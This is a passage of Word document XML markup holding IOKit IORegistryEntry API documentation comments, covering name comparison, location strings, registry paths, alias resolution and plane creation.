        <w:t>    @result A reference to an OSSymbol for the name, which should be released by the caller.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Nam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mpareNames</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Compares the name of the entry with one or more names, and optionally returns the matching name.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This method is called during IOService name matching and elsewhere to compare the entry's global name with a list of names, or a single name. A list of names may be passed as any OSCollection of OSStrings, while a single name may be passed an OSString, in the name parameter. compareNames will call the compareName method for each name, for overrides.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param name The name or names to compare with as any OSCollection (eg. OSArray, OSSet, OSDictionary) of OSStrings, or a single name may be passed an OSString.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param matched If the caller wants the successfully matched name returned, pass a non-zero pointer for the matched parameter and an OSString will be returned here. It should be released by the caller.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result True if one of the names compared true with the entry's global nam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compareName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Objec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matche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mpareName</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abstract Compares the name of the entry with one name, and optionally returns the matching name.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This method is called during IOService name matching and elsewhere from the compareNames method. It should be overridden to provide non-standard name matching.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param name The name to compare with as an OSString.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param matched If the caller wants the successfully matched name returned, pass a non-zero pointer for the matched parameter and an OSString will be returned here. It should be released by the caller. Generally, this will be the same as the name parameter, but may not be if wildcards are used.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result True if the name compared true with the entry's global nam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compare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String</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matche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Name</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Sets a name for the registry entry, in a particular plane, or globally.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion Entries can be named in a particular plane, or globally. If the plane is specified the name applies only to that plane, otherwise the global name is set. The global name defaults to the entry's meta class name if it has not been named.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param name An OSSymbol which will be retained.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param plane The plane object, or zero to set the global nam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set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Name</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Sets a name for the registry entry, in a particular plane, or globally.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion Entries can be named in a particular plane, or globally. If the plane is specified the name applies only to that plane, otherwise the global name is set. The global name defaults to the entry's meta class name if it has not been named.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param name A const C-string name which will be copied.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param plane The plane object, or zero to set the global nam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setNam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Location</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Returns the location string assigned to the registry entry as a C-string.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion Entries can given a location string in a particular plane, or globally. If the entry has had a location set in a plane and the plane is specified that location string will be returned, otherwise the global location string is returned. If no global location string has been set, zero is returned.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param plane The plane object, or zero for the global name.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result A C-string location string, valid while the entry is retained,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copyLocation</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Returns the location string assigned to the registry entry as an OSSymbol.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion Entries can given a location string in a particular plane, or globally. If the entry has had a location set in a plane and the plane is specified that location string will be returned, otherwise the global location string is returned. If no global location string has been set, zero is returned.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param plane The plane object, or zero for the global name.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result A reference to an OSSymbol for the location if one exists, which should be released by the caller, or zero.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opy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setLocation</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Sets a location string for the registry entry, in a particular plane, or globally.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion Entries can be given a location string in a particular plane, or globally. If the plane is specified the location applies only to that plane, otherwise the global location is set. The location string may be used during path lookups of registry entries, to distinguish between sibling entries with the same name. The default IORegistryEntry parsing of location strings expects a list of hex numbers separated by commas, though subclasses of IORegistryEntry might do their own parsing.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param location A C-string location string which will be copied, or an OSSymbol which will be retained.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param plane The plane object, or zero to set the global location string.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set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set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ath</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Create a path for a registry entry.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion The path for a registry entry is copied to the caller's buffer. The path describes the entry's attachment in a particular plane, which must be specified. The path begins with the plane name followed by a colon, and then followed by '/' separated path components for each of the entries between the root and the registry entry. Each component is constructed with the getPathComponent method called in each entry. An alias may also exist for the entry, which are described as properties in a registry entry found at /aliases in the plane. If a property value interpreted as a path in a call to IORegistryEntry::fromPath yields the entry, then the property name is used as the entry's path.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param path A char buffer allocated by the caller.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>    @param length An in/out parameter - the caller sets the length of the buffer available, and getPath returns the total length of the path copied to the buffer.</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getPath will fail if the entry is not attached in the plane, or if the buffer is not large enough to contain the path.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get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leng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getPathComponent</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Create a path component for a registry entry.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion Each component of a path created with getPath is created with getPathComponent. The default implementation concatenates the entry's name in the the plane, with the "at" symbol and the location string of the entry in the plane if it has been set.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param path A char buffer allocated by the caller.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param length An in/out parameter - the caller sets the length of the buffer available, and getPathComponent returns the total length of the path component copied to the buffer.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param plane The plane object.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result true if the path fits into the supplied buffer or false on a overflow.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getPathCompone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leng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fromPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Looks up a registry entry by path.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This function parses paths to lookup registry entries. The path may begin with the &lt;plane name&gt;: created by getPath, or the plane may be set by the caller. If there are characters remaining unparsed after an entry has been looked up, this may be considered an invalid lookup, or those characters may be passed back to the caller and the lookup successful.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param path A C-string path.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param plane The plane to lookup up the path, or zero, in which case the path must begin with the plane name.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param residualPath If the path may contain residual characters after the last path component, the residual will be copied back to the caller's residualPath buffer. If there are residual characters and no residual buffer is specified, fromPath will fail.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param residualLength An in/out parameter - the caller sets the length of the residual buffer available, and fromPath returns the total length of the residual path copied to the buffer. If there is no residualBuffer (residualPath = 0) then residualLength may be zero also.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param fromEntry The lookup will proceed rooted at this entry if non-zero, otherwise it proceeds from the root of the plane.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result A retained registry entry is returned on success, or zero on failure. The caller should release the entry.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from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residualPa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residualLeng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from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fromPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Looks up a registry entry by relative path.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion This function looks up a entry below the called entry by a relative path. It is just a convenience that calls IORegistryEntry::fromPath with this as the fromEntry parameter.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param path See IORegistryEntry::fromPath.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param plane See IORegistryEntry::fromPath.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param residualPath See IORegistryEntry::fromPath.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param residualLength See IORegistryEntry::fromPath.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result See IORegistryEntry::fromPath.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hildFrom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residualPa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residualLeng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dealiasPath</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Strips any aliases from the head of path and returns the full path.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion If the path specified begins with an alias found in the /aliases entry, the value of the alias is returned, and a pointer into the passed in path after the alias is passed back to the caller. If an alias is not found, zero is returned and the path parameter is unchanged.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param opath An in/out paramter - the caller passes in a pointer to a C-string pointer to a path. If an alias is found, dealiasPath returns a pointer into the path just beyond the end of the alias.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param plane A plane object must be specified.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result A C-string pointer to the value of the alias if one is found, or zero if not.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dealiasPath</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pa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function makePlane</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @abstract Constructs an IORegistryPlane object.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @discussion Most planes in IOKit are created by the OS, although other planes may be created.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @param name A C-string name for the new plane, to be copied.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
        <w:t>    @result A new instance of an IORegistryPlane, or zero on failure.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makePlan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nam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i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>/*!    @abstract Returns an ID for the registry entry that is global to all tasks.</w:t>
      </w:r>
      <w:r w:rsidRPr="00A43021">
        <w:rPr>
          <w:rFonts w:ascii="Courier" w:eastAsia="宋体" w:hAnsi="Courier" w:cs="宋体"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="0000FF"/>
          <w:sz w:val="15"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:br/>
